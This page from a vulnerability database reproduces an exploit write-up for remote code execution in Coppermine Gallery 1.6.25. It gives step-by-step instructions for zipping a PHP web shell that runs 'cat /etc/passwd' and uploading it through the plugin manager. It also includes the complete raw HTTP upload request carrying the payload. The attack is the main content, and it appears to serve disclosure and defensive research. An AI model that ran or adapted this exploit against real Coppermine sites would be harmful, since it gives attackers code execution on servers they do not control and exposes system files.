Vulners
Lucene search
Coppermine Gallery 1.6.25 - RCE
Exploit Title: coppermine-gallery 1.6.25 RCE
Application: coppermine-gallery
Version: v1.6.25
Bugs: RCE
Technology: PHP
Vendor URL: https://coppermine-gallery.net/
Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zip
Date of found: 05.09.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps
1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.
$ cat >> test.php
<?php echo system('cat /etc/passwd'); ?>
$ zip test.zip test.php
1. Login to account
2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
3. Upload zip file
4. Visit to php file http://localhost/cpg1.6.x-1.6.25/plugins/test.php
poc request
POST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1
Host: localhost
Content-Length: 630
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342c
Connection: close
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="plugin"; filename="test.zip"
Content-Type: application/zip
PK
�����b%Wz½µ}(���(����
�test.phpUT �ñòödÓòödux
���������<?php echo system('cat /etc/passwd');?>
PK
�����b%Wz½µ}(���(������������¤����test.phpUT�ñòödux
���������PK������N���j�����
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="form_token"
50982f2e64a7bfa63dbd912a7fdb4e1e
------WebKitFormBoundaryi1AopwPnBYPdzorF
Content-Disposition: form-data; name="timestamp"
1693905214
------WebKitFormBoundaryi1AopwPnBYPdzorF--Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2023 00:00Current
7.4High risk
Vulners AI Score7.4